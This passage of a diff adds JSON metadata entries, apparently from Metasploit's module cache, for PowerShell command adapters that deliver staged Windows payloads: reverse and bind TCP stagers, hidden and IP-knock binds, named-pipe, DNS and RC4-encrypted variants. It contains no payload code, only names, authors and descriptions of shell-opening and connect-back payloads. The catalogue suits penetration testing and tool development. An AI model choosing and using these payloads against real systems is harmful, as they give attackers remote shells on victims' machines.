"/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/reverse_nonx_tcp", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_cmd/windows/powershell/patchupdllinject/reverse_ord_tcp": { + "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": 
"payload/cmd/windows/powershell/patchupdllinject/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "spoonm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/reverse_ord_tcp", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp": { + "name": "Powershell Exec, Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + 
"session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp" + }, + "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_allports": { + "name": "Powershell Exec, Reverse All-Port TCP Stager", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/reverse_tcp_allports", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_dns": { + "name": "Powershell Exec, Reverse TCP Stager (DNS)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf ", + "RageLtMan" + ], + "description": 
"Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/reverse_tcp_dns", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": 
"windows/patchupdllinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/reverse_tcp_rc4_dns", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid": { + "name": "Powershell Exec, Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", + "references": [], + 
"platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp": { + "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/bind_hidden_ipknock_tcp", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp": { + "name": "Powershell Exec, Hidden Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp", + "check": false, + "post_auth": false, 
+ "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/bind_hidden_tcp", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp": { + "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf 
", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/bind_named_pipe": { + "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "UserExistsError" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": 
"cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/bind_named_pipe", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp": { + "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/bind_nonx_tcp", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/bind_tcp": { + "name": "Powershell Exec, Bind TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + 
"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/bind_tcp", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_tcp" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4": { + "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid": { + "name": 
"Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/find_tag": { + "name": "Powershell Exec, Find Tag Ordinal Stager", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": 
"cmd/windows/powershell/patchupmeterpreter/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/find_tag", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/findtag_ord" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + 
"author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/reverse_nonx_tcp", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp": { + "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "spoonm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": 
"cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/reverse_ord_tcp", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp": { + "name": "Powershell Exec, Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/reverse_tcp", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports": { + "name": "Powershell Exec, Reverse All-Port TCP Stager", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": 
"Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_allports", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns": { + "name": "Powershell Exec, Reverse TCP Stager (DNS)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf ", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_dns", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_dns" + }, + 
"payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption 